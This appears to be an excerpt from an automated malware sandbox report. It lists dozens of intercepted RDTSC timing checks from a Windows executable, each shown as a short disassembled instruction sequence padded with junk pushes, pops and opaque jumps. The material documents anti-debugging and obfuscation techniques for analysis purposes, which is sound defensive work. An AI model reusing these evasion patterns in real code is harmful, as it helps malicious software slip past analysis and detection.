                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83D26 second address: C83D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83E95 second address: C83EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6398F5EC9Bh 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83EA9 second address: C83EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6398F5B496h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F6398F5B496h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83EBC second address: C83ECC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F6398F5ECB2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84020 second address: C84026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84026 second address: C8405D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6398F5ECAAh 0x0000000c jmp 00007F6398F5ECA4h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6398F5ECA3h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8748D second address: C874B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jo 00007F6398F5B49Eh 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C874B0 second address: C874CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 js 00007F6398F5EC9Eh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C874CE second address: B11987 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6398F5B49Ch 0x0000000c popad 0x0000000d pop eax 0x0000000e push dword ptr [ebp+122D09DDh] 0x00000014 mov edi, ebx 0x00000016 call dword ptr [ebp+122D3064h] 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D183Dh], edx 0x00000023 xor eax, eax 0x00000025 jc 00007F6398F5B49Ah 0x0000002b pushad 0x0000002c mov edx, edi 0x0000002e popad 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 pushad 0x00000034 sub dword ptr [ebp+122D183Dh], ecx 0x0000003a popad 0x0000003b stc 0x0000003c mov dword ptr [ebp+122D2CB7h], eax 0x00000042 stc 0x00000043 mov esi, 0000003Ch 0x00000048 or dword ptr [ebp+122D3120h], edx 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 jng 00007F6398F5B4A2h 0x00000058 jbe 00007F6398F5B49Ch 0x0000005e jbe 00007F6398F5B496h 0x00000064 lodsw 0x00000066 mov dword ptr [ebp+122D2566h], esi 0x0000006c jmp 00007F6398F5B4A3h 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 cld 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D3120h], ecx 0x00000080 nop 0x00000081 jmp 00007F6398F5B4A1h 0x00000086 push eax 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b popad 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87501 second address: C8750B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6398F5EC96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C876CC second address: C876D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6398F5B496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C876D6 second address: C876DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C876DA second address: C8773A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F6398F5B49Fh 0x00000010 mov si, DC23h 0x00000014 pop edx 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D38C6h], ecx 0x0000001d push E25F0FD6h 0x00000022 jmp 00007F6398F5B4A0h 0x00000027 add dword ptr [esp], 1DA0F0AAh 0x0000002e je 00007F6398F5B49Ch 0x00000034 mov dword ptr [ebp+122D37C8h], edi 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e cld 0x0000003f push 00000003h 0x00000041 push C9DAB370h 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87921 second address: C87926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87926 second address: C8792C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8792C second address: C87930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD88 second address: C7CDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6398F5B496h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6398F5B4A5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6458 second address: CA645E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA645E second address: CA6463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6463 second address: CA646D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6398F5ECA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA646D second address: CA6473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA66FC second address: CA6700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6700 second address: CA6704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E1B second address: CA6E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5ECA0h 0x00000009 jmp 00007F6398F5EC9Fh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6398F5ECA7h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E5F second address: CA6E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F6398F5B496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E6B second address: CA6E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6398F5ECA9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E8B second address: CA6E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F6398F5B496h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7F68 second address: CA7F86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F6398F5ECA2h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7F86 second address: CA7F9D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6398F5B49Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA840A second address: CA840E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB0C2 second address: CAB0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6DB74 second address: C6DB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jno 00007F6398F5EC96h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3279 second address: CB327F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB327F second address: CB3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB459E second address: CB45C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F6398F5B4A3h 0x0000000e pushad 0x0000000f jo 00007F6398F5B496h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47AF second address: CB47B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47B3 second address: CB47B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47B9 second address: CB47D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5ECA9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47D6 second address: CB47DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB509E second address: CB50B1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007F6398F5EC96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5289 second address: CB52A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB535B second address: CB5372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5372 second address: CB537B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB537B second address: CB537F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB54BB second address: CB54BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB54BF second address: CB54C9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6398F5EC9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB59BD second address: CB59F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F6398F5B4A2h 0x0000000f jmp 00007F6398F5B4A6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB59F0 second address: CB59F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8D9F second address: CB8DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8DA3 second address: CB8DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8DA9 second address: CB8DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8DAF second address: CB8E0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F6398F5EC98h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007F6398F5EC9Fh 0x0000002d push 00000000h 0x0000002f jmp 00007F6398F5EC9Eh 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B2D7 second address: C7B2EC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnl 00007F6398F5B496h 0x0000000b pop esi 0x0000000c pushad 0x0000000d jg 00007F6398F5B496h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC0F7 second address: CBC0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC0FB second address: CBC0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E7EB second address: C7E80A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6398F5EC9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F6398F5EC98h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2A1F second address: CC2A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D2D1Fh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F6398F5B498h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov bx, A490h 0x00000030 xchg eax, esi 0x00000031 jo 00007F6398F5B4ADh 0x00000037 jl 00007F6398F5B4A7h 0x0000003d jmp 00007F6398F5B4A1h 0x00000042 push eax 0x00000043 jl 00007F6398F5B4ADh 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F6398F5B49Fh 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3A10 second address: CC3A1A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6398F5EC9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2CC2 second address: CC2CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2CC6 second address: CC2CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC598F second address: CC5993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4AFD second address: CC4B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5993 second address: CC59A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B49Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6A14 second address: CC6A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5B53 second address: CC5B72 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6398F5B49Ch 0x00000008 jnp 00007F6398F5B496h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F6398F5B49Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6A1A second address: CC6A5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F6398F5EC98h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov di, 5D42h 0x00000029 mov dword ptr [ebp+12459F66h], esi 0x0000002f push 00000000h 0x00000031 mov ebx, dword ptr [ebp+122D370Eh] 0x00000037 push eax 0x00000038 pushad 0x00000039 pushad 0x0000003a jne 00007F6398F5EC96h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6A5E second address: CC6A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8910 second address: CC8984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D23E2h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F6398F5EC98h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F6398F5EC98h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 xchg eax, esi 0x00000048 jnl 00007F6398F5ECA2h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 js 00007F6398F5EC96h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9923 second address: CC9927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCB739 second address: CCB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD8B2 second address: CCD8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA99F second address: CCAA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, eax 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov dword ptr [ebp+122D33A7h], esi 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F6398F5EC98h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Ch 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov eax, dword ptr [ebp+122D0741h] 0x0000003f jno 00007F6398F5ECA2h 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F6398F5EC98h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 00000017h 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 jmp 00007F6398F5ECA7h 0x00000066 sub bh, 0000001Eh 0x00000069 push eax 0x0000006a push edi 0x0000006b pushad 0x0000006c pushad 0x0000006d popad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCB90D second address: CCB91C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5B49Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCA64 second address: CCCA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE83A second address: CCE8D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 jnp 00007F6398F5B4AAh 0x0000000e jmp 00007F6398F5B4A4h 0x00000013 pop ecx 0x00000014 nop 0x00000015 movzx ebx, si 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F6398F5B498h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jmp 00007F6398F5B4A3h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F6398F5B498h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 movsx edi, dx 0x00000058 call 00007F6398F5B49Ch 0x0000005d sub dword ptr [ebp+122D2648h], edx 0x00000063 pop ebx 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jns 00007F6398F5B49Ch 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDB9C second address: CCDBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBA07 second address: CCBA11 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6398F5B496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDBA0 second address: CCDBAE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCFA40 second address: CCFA4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F6398F5B496h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDBAE second address: CCDBB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD4489 second address: CD44A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5B4A7h 0x00000009 rdtsc
